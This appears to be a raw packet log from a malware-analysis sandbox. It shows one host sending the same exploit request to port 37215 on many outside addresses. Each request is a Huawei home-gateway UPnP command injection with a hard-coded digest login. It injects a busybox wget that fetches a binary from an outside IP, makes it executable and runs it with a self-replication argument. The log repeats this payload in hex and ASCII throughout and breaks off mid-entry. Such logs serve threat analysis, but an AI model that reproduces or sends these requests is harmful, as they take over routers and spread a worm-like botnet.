                                                  May 29, 2024 15:15:24.743387938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042716980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522649050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2239192.168.2.1344422203.197.78.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.743467093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042726994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522645950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2240192.168.2.133734841.238.242.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.743536949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042726994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522645950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2241192.168.2.1343544197.100.224.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.743562937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042726994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
